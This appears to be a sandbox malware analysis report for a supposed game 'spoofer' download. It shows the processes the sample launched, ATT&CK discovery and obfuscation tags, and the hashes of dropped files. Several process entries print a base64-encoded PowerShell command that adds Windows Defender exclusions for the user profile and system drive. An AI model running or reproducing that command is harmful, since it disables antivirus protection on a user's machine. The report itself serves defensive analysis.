"C:\Users\Admin\Downloads\Ghosty Permanent Spoofer\KA-MemIntegrity_x86_x64_v1.1.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5776

C:\Users\Admin\Downloads\Ghosty Permanent Spoofer\GHOSTYFN.exe
"C:\Users\Admin\Downloads\Ghosty Permanent Spoofer\GHOSTYFN.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5864
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAbAB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwBrACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:6128
- C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe
  "C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:6120
- C:\Users\Admin\AppData\Local\Temp\spoof.exe
  "C:\Users\Admin\AppData\Local\Temp\spoof.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5216

C:\Users\Admin\Downloads\Ghosty Permanent Spoofer\GHOSTYFN.exe
"C:\Users\Admin\Downloads\Ghosty Permanent Spoofer\GHOSTYFN.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4476
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAbAB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwBrACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1616
- C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe
  "C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:4300
- C:\Users\Admin\AppData\Local\Temp\spoof.exe
  "C:\Users\Admin\AppData\Local\Temp\spoof.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2608

C:\Users\Admin\Downloads\Ghosty Permanent Spoofer\GHOSTYFN.exe
"C:\Users\Admin\Downloads\Ghosty Permanent Spoofer\GHOSTYFN.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3124
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAbAB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwBrACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5208
- C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe
  "C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:5320
- C:\Users\Admin\AppData\Local\Temp\spoof.exe
  "C:\Users\Admin\AppData\Local\Temp\spoof.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5964

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: GetForegroundWindowSpam
PID:4608

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SDRSVC
1⤵
PID:5792

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
f9349064c7c8f8467cc12d78a462e5f9

SHA1
5e1d27fc64751cd8c0e9448ee47741da588b3484

SHA256
883481fe331cb89fb6061e76b43acd4dd638c16f499b10088b261036c6d0547b

SHA512
3229668491b5e4068e743b31f2896b30b1842faf96aff09fad01b08771c2f11eb8d8f02a3b76e31f0d6ad650c2894c5ac1822204e132c03d9c2b8df6ca4cd7cf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\spoof.exe.log

Filesize
805B

MD5
c540eb958f4de97e0d73470e29e46f54

SHA1
d7484efb1c03c4d38d9c918dd21b1dcd08ad5d4b

SHA256
788d8d30870b1ff836bbee523023153bab39b8b8b9c77714b556b71e816b037a

SHA512
4f9311b2521918aafa13fae7f149f724795b8e2a10df173a54a78af2e4431605cca98aa7523d9fbb025b77a5a316a430d53d8989b94030c6f8ab3944b4cc087a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
21KB

MD5
51e034efb6c5c1a16f3c3e0289443928

SHA1
000379a44a16f23ec80d47660685018cf436fd94

SHA256
8d752c857d4981e5e492677aeae233bb40b969a6372e60b6ccffadbdd597fd58

SHA512
45ee7d40b7ec9b7046fd1b8605841d3980f6a68cca5b8d5a70e16b7b9d2a0971ccc0da3188b972754ff6f542a50fdd33add8d87eb9c63991885e4758a36b586a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
21KB

MD5
43bd0faf155051a375cee0d108fb4891

SHA1
a98d4d077bb0402274a30ffdc662fc31666efb69

SHA256
2b0d36acf6db2b8a8838bed652b6fdabac87762fec293a09152cf6b7ebcf99dc

SHA512
8eb30377ce6187da91e9e51fe8b32cb607d0da1a77a7d6d172c58faa66e007972aff03fdd4403ba655dfb3d3618b30a64926d19b609b4e28323b4aed60bd4598

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\br0f5134.default-release\activity-stream.discovery_stream.json

Filesize
25KB

MD5
2e32caee7bd9db1e8400e644c10854f0

SHA1
aa33d878a1323629bd075e575c6eb66593cd0690

SHA256
e16b6f4bff0496669ffd7cd885bd18cabdb9273ec2c724874dfaeea94ce84b2e

SHA512
ab42ba2a3b82a686ead4871543d8018ff3733542bd421d6690e6c2fcfcfb540e16ff86c1652834c8ee84109f97d945eb016887a14b5c6b20e742fbc2f0fed64b

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\br0f5134.default-release\cache2\entries\7B3517DD0088CB493E43CA8924C574A4EB6AFD11

Filesize
12KB

MD5
10d482e41faeb24fb0c0f67c231cb22f

SHA1
4b96848678efac21cbe7fc95eb19df0a8fb76e92

SHA256
bc0de4eba27f735ce46ebfa68ed4093fd598fb0f810b72618ebc70d71575ec55

SHA512
feaaf225ede0e8aec82f8a251b169da19e7a2d12a9b4238590389448cc33daf639dc60c231091033c69ff6dfebdf786cf556300b517ae24ce0049913a9d7e054

Download Submit
C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe

Filesize
4.9MB

MD5
e65c905174e5f9951a79413833422356

SHA1
9a8f620da9358e95323548943ca06e6259f44623

SHA256
df7e9a74650903532a58491fb925a97114c765d8551b205d5b74cd77b6d0e062

SHA512
534f96d756e4584b2e5a441c059ae9456b7e899e1cca3e95ed3a9c65313ceb872575a6e29b38aba57139fe4c8660d31dda9842a6ad1c6f735aa2d93473711465

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0a1gckj1.zyt.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\spoof.exe

Filesize
1.2MB

MD5
d66d5168a0fb7326e23963f4e8502e32

SHA1
8e5d448ff498a01afc000f9be8a3d5a6591c2a9a

SHA256
7d0f79a9febca115226349613a122d06c83e4fc9b8d955e6cc7654bad357ff9e

SHA512
5a06b4c83cdee5ff2d6b7c914a021c8e7f43370f2ee3a63d376fbf568648a162098b956d3eb1fe9cf5920c269868f40fc0dc43f73ac7413039eea71056a9eb19

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon

Filesize
479KB

MD5
09372174e83dbbf696ee732fd2e875bb

SHA1
ba360186ba650a769f9303f48b7200fb5eaccee1

SHA256
c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f

SHA512
b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

Filesize
13.8MB

MD5
0a8747a2ac9ac08ae9508f36c6d75692

SHA1
b287a96fd6cc12433adb42193dfe06111c38eaf0

SHA256
32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03

SHA512
59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

Download Submit
C:\Users\Admin\AppData\Roaming\GamerView\sqlite3.dll

Filesize
626KB

MD5
d8aec01ff14e3e7ad43a4b71e30482e4

SHA1
e3015f56f17d845ec7eef11d41bbbc28cc16d096

SHA256
da1d608be064555ab3d3d35e6db64527b8c44f3fa5ddd7c3ec723f80fc99736e

SHA512
f5b2f4bda0cc13e1d1c541fb0caea14081ee4daffd497e31a3d4d55d5f9d85a61158b4891a6527efe623b2f32b697ac912320d9be5c0303812ca98dcc8866fcf

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

Filesize
9KB

MD5
52e304846e00a13501d731d4c51e5387

SHA1
9ae1810cfc8e23035e92f0f0eb51f469ea8b62e5

SHA256
44c4c60a9b22fa80b640943426b11900041ee1bc78137f3a6aa23c27191b2a95

SHA512
027d22040ab05077ff79ce64c12bf4e0311108f2e4ee338e05a3fee1572225452cc54eaf64861bcc86b4f143ecc031940570cf6087e66234e97b4c54a34ae2ab

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

Filesize
9KB

MD5
8ec170a3ca9add8cdd0210ff4860558e

SHA1
7e7c64df1a846e3424c0aa4638e4c59abff0716d

SHA256
dd6cfae12fb3be9ecf371e60963238605dff526d18c37af7140519f1601a59ee

SHA512
1890170f12f92496fffc2e277f7a9b517c63fa38e542b0d29b20011f8ac0e48226aac55f7f1b872dc4a3046e9755f00f8bd61733c1901b72d7ce78ec1444ec3e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

Filesize
9KB

MD5
a9d8679721cc6d527d13701e8c12edfe

SHA1
935093533e089a34e59825274a45bdb8637b8900

SHA256
2c8169f56b66c0562c04fc85ed951b1b0d02a8eab86ebd596a787f78f9b79288

SHA512
bc6803cda3e624ec8a7f264d329775dc67308103c13558624898085ab766b4635d76d77bec4deafee187e4f0834bc4fb4f8f25bc3e0c30b7c6aa155b7027b01c

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\br0f5134.default-release\AlternateServices.bin

Filesize
8KB

MD5
a9b1896aa457aeed963a78cee0c0adec

SHA1
36af9b084422c4282ea7a596cbce721be56e71bd

SHA256
0455254f0fa5ee85d63850013c6657ee307d56fea4f9b9df46c9b9ad64c4816e

SHA512
77597d5ee9942fcdab8f0611429e2de37f5769042aae7f45db4fc9ba20cc440cdb63d270884a58c8c7718d3e2d65568b4894fc0fb1b9d4d2ae6b020148205d02

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\br0f5134.default-release\AlternateServices.bin

Filesize
11KB

MD5
5d8cd657a25b88f65bee37a285ee7b6d

SHA1
6b7bd4efd2bf34e302bc7e962e9eda5a79757cd4

SHA256
8017a28f907eb4449ad034a0b3c8532c1e758274a8c4859022cff9ac7bbc9f3d

SHA512
04abb0cec4f55ad948db2f9d74052ee4e76c2fa128c73c29df8d2d854186b4d0acf50a946e02fbcd9538bbc098f65a865f2f437c32dc3d0baff98fc51eedb41c

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\br0f5134.default-release\datareporting\glean\db\data.safe.tmp

Filesize
5KB

MD5
c4a7ad4c57f85cd72b87625ae735171e

SHA1
746f2c799e4aa6a863a599a8b09eb53fb35915eb

SHA256
7aea338befe6b4726e2347ae02b7e3169210e69ed561b157b5fca7ffbc82609a

SHA512
1365a7217ce75de400e999ad76ea36703af54ae3bdfb55385d3cd610dfc484a5059d63725fbbe558281b0da803c1467fb0801b5df3947d5b2b39dcf742708420

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\br0f5134.default-release\datareporting\glean\db\data.safe.tmp

Filesize
6KB

MD5
1e222265b443049ae9a17410da1c40b9

SHA1
70ea6773fadfc69e95becfc320a4754c08ad8a81

SHA256
28062d2916094d09286e5a3ad39732d43bfc23218f71d7156892b1f199b00952

SHA512
13f7d20994a01f1b797afb7e276e8f27bf5580cf90258873357464376354a5a08bdae7adc40316ad7c03380e28dfddaaed947f333eb969f76caf77050b4c5bee

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\br0f5134.default-release\datareporting\glean\db\data.safe.tmp

Filesize
38KB

MD5
e0aed1fb5831e5970c075a8c6f264789

SHA1
9e13a1e211e673a280c0fdecc454b49d797ffb12

SHA256
140e18c0fe0215c5fa4666cac6570a8c9ed045c8d60a668d701d3985b8102cee

SHA512
dbbb64701a824178cb8bc4d4035f4c2889a0cd7ce5ca52998aa2b39364e36e67c4a2376eea05e563261c2f1f9311477aa3b83c1f82d07c4d443c75edc774eeba

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\br0f5134.default-release\datareporting\glean\pending_pings\048eca9a-735b-426a-9558-dbc28cf3aa9d

Filesize
671B

MD5
b2945b5649afa5300f2d5123ca5739d5

SHA1
02223cdbf0f24713bef48cd60a8c1c477f177e82

SHA256
0563d952b29cc798d6202d5d9fc4c0bf23b479ecfc02118b617cebb4a256cc1a

SHA512
f917361842371ab950c457f8c9ca2a80476dcd6244fe3f9dfd2571b75a43c06033a35d8aef3c9b07c23042771bb3e4b3d14d5e8ece607e57cc5ea7678611c8fa

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\br0f5134.default-release\datareporting\glean\pending_pings\43609b6a-6d1b-4d75-a5e6-20578192128e

Filesize
982B

MD5
68bc7362a66ec50a07022b118b28c70b

SHA1
2ac261dcb7e95278308ae362f1d4c5b439cf79e8

SHA256
4cffe100527a1518a0cbff8de266d484c1cc8d1695046b742f1f58d5b38b6196

SHA512
d6af511a742e4624089c267deef737baaf624c57442babaaf25b0cd22648ef32a09b93827941753a9eb1bd887d72db52383716d923406b27a8b682f8fef98b23

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\br0f5134.default-release\datareporting\glean\pending_pings\7d570eb9-9d98-4d49-834d-350d8fc3d637

Filesize
26KB

MD5
963aea562cbba12ccd048ff9d2cedae0

SHA1
9e59ad1b330a668105bfa5f82ac5853d49ad19bd

SHA256
ffe97f352fe2495d0eceb825d3bb267e3662fac322d8ab11300c3023e1426701

SHA512
0d3d0687f409e646b5d9590d1914ee556c36c0861901fc8bb7d9938cb48a873539aede609b7773c3c5013549b752cd81e3e1340762db3c04d63f62130f382f6c

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\br0f5134.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

Filesize
1.1MB

MD5
842039753bf41fa5e11b3a1383061a87

SHA1
3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153

SHA256
d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c

SHA512
d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\br0f5134.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

Filesize
116B

MD5
2a461e9eb87fd1955cea740a3444ee7a

SHA1
b10755914c713f5a4677494dbe8a686ed458c3c5

SHA256
4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc

SHA512
34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\br0f5134.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

Filesize
372B

MD5
bf957ad58b55f64219ab3f793e374316

SHA1
a11adc9d7f2c28e04d9b35e23b7616d0527118a1

SHA256
bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda

SHA512
79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\br0f5134.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

Filesize
17.8MB

MD5
daf7ef3acccab478aaa7d6dc1c60f865

SHA1
f8246162b97ce4a945feced27b6ea114366ff2ad

SHA256
bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e

SHA512
5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\br0f5134.default-release\prefs-1.js

Filesize
11KB

MD5
407fdc3a081e52eaef33e20c34912437

SHA1
d590e37a90d867910aadebe5bd2c943bca9113df

SHA256
25ae638e5e3f637630f0dd7d4494418097cfca8667033f8774d9b5fdbd9e46f2

SHA512
9770afdcb8cb276494400c043d457e25d0fc56e6f034f4988f7f424f02efce42e6516ba0a4d3c17f18f5c7345e97ab47f7b2b9136578fe4669427a03ec3f1ca5

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\br0f5134.default-release\prefs-1.js

Filesize
10KB

MD5
734ea80c3a5a5680debc9666d046605f

SHA1
6cf7bdd9a0bb69b3bda230c28cc82cd4658adc21

SHA256
feee1ae97177aca74bebff3394a20ee45b51c02a0c0b5f0e0fff08ac230fc272

SHA512
faa2e1e25bba1113441a10a2a84c3f795a99149e3f7fc550cb83beaf7f8e457ac2f6cb8e151e6ccb3fb104a045024bbe8fb1667dbb99dfaeccf0b865e42c863c

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\br0f5134.default-release\prefs.js

Filesize
9KB

MD5
45a059f7e40c686d65167c847b67f586

SHA1
0ba350d923edd70ba33f9e5b2df883251c5b1b56

SHA256
28e7f9179a5e2cb4d51eb6fbc859c2df226fe460b1d59e10f047acbf62ef7a0e

SHA512
fb97be7562ccbc21636f97aaf9cf529146457c1b900b3d9988dcc9e77fc9d93a734ff08d93801240d5829ff6b34cb646d952b8194316b6c81e2243b2740ace94

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\br0f5134.default-release\prefs.js

Filesize
10KB

MD5
892908b59d154c88311f14116dcc89c2

SHA1
c5cb5fda6bd7f1a64bbe28c682b1cc3108bced7c

SHA256
206e79c0fed8df6c7359cbc94cc008f8e7cec538da14606c6d53847b6beeeac3

SHA512
1ccbf8fcaa92fbe3c003cce2668b91088574f0af05ed41570f6befb9fd9ee814c5bd4eb781b4833af136fe39e3dbda75ada09e37af802c33a9bafa7e44c6005f

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\br0f5134.default-release\sessionstore-backups\recovery.baklz4

Filesize
2KB

MD5
27d3ba9d08143499c4ca203b86cde1dd

SHA1
6e8b616e76f97978eefb9390bee80fa66028e7ef

SHA256
1e0da457b7c47c36a73b9ef3f27427cef0b59b476442fe37d47b745f84f0e357

SHA512
796aaf9ae02e609d93dd41b4a0432bba129b8f7382e01266be7400792689d463875b83272dff5a754fb0a15ecb9bf2a15cc6e7a124c773e92719f68fc259d78c

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\br0f5134.default-release\sessionstore-backups\recovery.baklz4

Filesize
2KB

MD5
8663716b2dac103d481e1a217ffbff04

SHA1
4668dfd4b380dee6be091662b3c2217f8b190dcb

SHA256
e6ecda3c988bd338ab75ee313e1e0b6e54f1f8dcfb56cfb56ca38e09d667be62

SHA512
2eb91ba5eab499a1e32f26f05c2ef2711a85993f16f8c7dddea67c7e1cda10353dfee023ac8e93b1fd08a759ca5d5c627d4426d352dd40ad77be20c5056c7e7f

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\br0f5134.default-release\sessionstore-backups\recovery.baklz4

Filesize
2KB

MD5
f47ca316565a99065878982877cc91eb

SHA1
ad61b4ed7e29a87ab2747669c358e23d56fa533f

SHA256
85c8f44dbf543faabace0879b3b7a56e4f49c256dd221c4e022d89792ecac943

SHA512
39096287b00224482be7a8e922a11dc9f423c9a4cfb0421f8b6ab8c65623ed9bfb26308d09ee78f39b6f49361e923382b07236a1d8e56b3db3504639b42c33fe

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\br0f5134.default-release\sessionstore-backups\recovery.baklz4

Filesize
2KB

MD5
e7fa14c66c88149d9451288b7d8baebe

SHA1
6e09eb367039ed283be22dd52c5566f188439d6f

SHA256
1b9925dd69ea5a3ef0aa35458487df5dde2525de126e677cd7d4c0f2f483023d

SHA512
d062d297a59e9ca25d4ab4a498d215654febb4e58b4155519a70540fe2d8e198c3cbffd1eb1edaf422a20189ede52d28ac460ad0f6a05eb8ffa47e339de541a7

Download Submit
C:\Users\Admin\Downloads\Ghosty Permanent Spoofer.4iD57dFO.rar.part

Filesize
33.5MB

MD5
44a687ff5f4954f86d0a911cec843437

SHA1
c0379b53e62c3aa490435ebec901442cf637d0e7

SHA256
873b3f4e9bcdf5c69e3928012df2b4d5fb94cb964f89ba842bdeb575178e031b

SHA512
9b352b9ba5c0daec9dde3d73d1c13188e19af6590b15f66fcde0337dd1e7a4b8f14913239b1706c057cd0aad91c7b67c8396fb7d28012fb28b13e21585a703a8

Download Submit
C:\Users\Admin\Downloads\Ghosty Permanent Spoofer\GHOSTYFN.exe

Filesize
6.1MB

MD5
73c7cc676ab19d426f2745ef261d6349

SHA1
f217a78eb2beddcbf5bb00c229a96f9ffaa98a0d

SHA256
4a513270a4d7e85bdc8dfe9adea3b190cfc055e562060c2be9389336333864a0

SHA512
40f69adef5b8de42283ff0539cf0f0259ed9d23baa4e87c63e594fe12ca7f35e73dc3a0d6a66dd13a584d0e1569940026bc49d41f95a1f23c0c3fd810613ad36

Download Submit
C:\Users\Admin\Downloads\Ghosty Permanent Spoofer\KA-MemIntegrity_x86_x64_v1.1.exe

Filesize
351KB

MD5
877a111203c6c66509c6a946822050aa

SHA1
bb88e7134729d0fa32335a573881f0bc73c298fe

SHA256
b0080c00e9fbe13df87806bd20826eb9735a8b67f3f6aae58b3b370ed381003c

SHA512
2723aaa1c12e7c64617da1a543c22f7a92a7df42cd825b78585711aaa650b330bfe75716fd5924e1b5b3d17ece2e6c9c2d69641ae1cc2b5e4889eff8cbef97a7

Download Submit
C:\Users\Admin\Downloads\Ghosty Permanent Spoofer\SafeGuard-Library.dll

Filesize
12.5MB

MD5
0ba40688b6a23948b2bd929dd2777a59

SHA1
bc109471bb84c7dc05ee6b1b63eae36c0e6ab209

SHA256
4e3eca4adbe0c4fede28228239dd93bb866ecd0415569ede6464d796e8d1a3a8

SHA512
104b2e48779d9e1f534ceb546f911e535eda1b2645f494313df661aceca41c134d3a10b3e97a00ddf4a40556421369fff3872e466357743bc21ea19e0b0c2156

Download Submit
C:\Users\Admin\Downloads\Ghosty Permanent Spoofer\VMProtectSDK64.dll

Filesize
116KB

MD5
ba5cf8079fa68d90a2e6497d3c5711c1

SHA1
66b3c641ccd9a04ebf35ea868548bf58de295a11

SHA256
ae22254e2b5c5557f35a170696d53e847018221dcd4cc70c153c36ecdd891f81

SHA512
8537604678bed001aca037d94c80d8d1dd3da3d5bf806fa687f44a093cb07a316dcef084b572b4fd9b3cd2d93fedc7db66a817b27f395a772f3b844509c30156

Download Submit
C:\Users\Admin\Downloads\Ghosty Permanent Spoofer\brotlicommon.dll

Filesize
134KB

MD5
f2e401ec1c85ba69b28cca6e814afe3c

SHA1
9d7d78e98fae9c22a2ff4a938672c3fe37589738

SHA256
b9b868f703ccb61ec15d14dcc738c4a4eebcc59c2f827090e7ced2f91c9debd7

SHA512
605f0fa4d301519b07bb542ec215e9fa1d7426129c1b8a8de56e5418c3e64867d1f54ece273ff070b8ca4c5bf39dbdebbdddd83d6be6e701bb160b95b4597be1

Download Submit
C:\Users\Admin\Downloads\Ghosty Permanent Spoofer\brotlidec.dll

Filesize
49KB

MD5
b388b7f74802614467a17854b4bf75ff

SHA1
0ec7a95503e27ee4735e0c4a7051125ece957ab1

SHA256
da4996a4d6b9e18c3ebce85b5fbd5666950e69e5d0e31afa2eef550c2671bd93

SHA512
7c45a583cacf798b36fc6241397536ecb2eb9a846531fa8906c5c93e0680151ab9cf448bfb5a229c38fac8d4b83cdb044f05b95bada5a047e4acbcbc64c4d0d8

Download Submit
C:\Users\Admin\Downloads\Ghosty Permanent Spoofer\bz2.dll

Filesize
74KB

MD5
d31259e39bc2690a34448601e0bf105f

SHA1
e5339404e51f56cc0349b250adb7e61dd4b22476

SHA256
c94f3302b33c45a35ba83448c111dd0138a49d6355c943af0ea40bc8014a991b

SHA512
79261bf57bc098d9c0e5f3cfa6acc2c353bc830fc7ae7201e13f3de54e4e584e5b1b5dfb4193818863cd36759b9c07d431b09f6ac74f6765827c4a2d47115541

Download Submit
C:\Users\Admin\Downloads\Ghosty Permanent Spoofer\freetype.dll

Filesize
675KB

MD5
5eb3264c300a0a0a45f22305cff49596

SHA1
06ef49a2d145dc98dbd5eea42b1de53b7039b5c4

SHA256
9aa4d1356beedaad8f8879b49b76d1ff120dec210a1c0135ede8b9337ad0505d

SHA512
a2735a950d3505a7c835e78ed245cbdbff3821d5c9c4ac24b933ee143eab9b95d55ab6cff3bba16229f372077d7cfe2aac9785149ab70e742ed177872cde6ba0

Download Submit
C:\Users\Admin\Downloads\Ghosty Permanent Spoofer\libpng16.dll

Filesize
197KB

MD5
ee63a5f831a47c40b38534b078742e53

SHA1
e8320fd97b77e717255ad3732d2c677de77405bd

SHA256
28f086ae4965dd262e000783a4fd8aebdce8eeeef8285db59984144e7a4c45d4

SHA512
7b051a6957723bf1413e6ccb29c688d10eb7f87553cdf5bc8d876ed3f3b6cd5e9bcbeabb151acb36e483587aafaf5ce43d80e2995153b3bcfc14ac9ef3e38726

Download Submit
C:\Users\Admin\Downloads\Ghosty Permanent Spoofer\zlib1.dll

Filesize
88KB

MD5
14fdb628e0b51f26a7bc3f59ec6e33f2

SHA1
05deb1793e0a51fd79de99b6738a93cc959522fd

SHA256
0fba4f6adcecbf2082ce52ebd6e7f07f7959b02ae401828aa640154933de40fe

SHA512
28fd35174a70636c367c85116a268dc178546d6f6e632b82b7bd164877555057d31eeec76e1be91e82ce02ce04b6a33f704022d2b31a7066d4b6cb70cd798d90

Download Submit
